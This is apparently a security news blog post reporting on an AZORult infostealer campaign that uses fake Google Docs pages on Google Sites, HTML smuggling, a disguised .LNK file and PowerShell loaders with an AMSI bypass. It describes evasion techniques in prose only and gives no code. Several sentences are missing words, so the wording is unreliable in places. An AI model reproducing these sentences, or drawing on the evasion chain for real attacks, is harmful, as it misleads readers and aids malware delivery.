Skip to content Skip to footer

New Malware Campaign Uses Fake Google Sites and HTML Smuggling for AZORult Distribution

A recent report from cybersecurity researchers revealed the discovery of a new campaign that uses fake Google Sites pages and HTML smuggling to propagate a commercial called AZORult. The campaign, not attributed to any specific or group, is designed to collect sensitive data for selling on underground forums.

According to Netskope Threat Labs researcher Jan Michael Alcantara, the campaign uses an unconventional HTML smuggling technique, where the malicious payload is concealed within a separate JSON file hosted on an external website. The method is a stealthy way of exploiting legitimate HTML5 and JavaScript features to assemble and launch the by “smuggling” an encoded malicious script. This allows the to bypass typical security controls, such as email gateways, which only inspect for suspicious attachments.

Once installed, AZORult, also known as PuffStealer and Ruzalto, can steal credentials, cookies, and browsing history from web browsers, take screenshots, and extract data from 137 cryptocurrency wallets. The latest attack activity involves the threat actor creating fake Google Docs pages on Google Sites that use HTML smuggling to deliver the payload.

The threat actor adds a CAPTCHA barrier to make the fake Google Docs page appear more legitimate. He provides an additional layer of protection against URL scanners. The downloaded file is a shortcut file (.LNK) that seems to be a PDF bank statement. However, when opened, it executes a series of intermediate batch and PowerShell scripts from a compromised domain.

One of the PowerShell scripts, called “agent3.ps1,” is responsible for fetching the AZORult loader (“service.exe”), which then downloads and executes another PowerShell script (“sd2.ps1”) containing the actual AZORult . This fileless infostealer uses reflective code loading to evade detection and an AMSI bypass technique to avoid being detected by host-based anti- products, including Windows Defender.

In conclusion, this new AZORult campaign is a highly sophisticated and attempt to distribute and steal sensitive information. The threat actor can bypass traditional security measures and infect devices using HTML smuggling and other techniques. Individuals and organizations must remain vigilant and cautious when opening emails or clicking on links from unknown sources to avoid falling victim to such attacks.

Leave a comment

Newsletter Signup

The Grid —
The Matrix Has Me
Big Bear Lake, CA 92315

01010011 01111001 01110011 01110100 01100101 01101101 00100000
01000110 01100001 01101001 01101100 01110101 01110010 01100101

I know kung-fuNeo

Deitasoft © 2024. All Rights Reserved.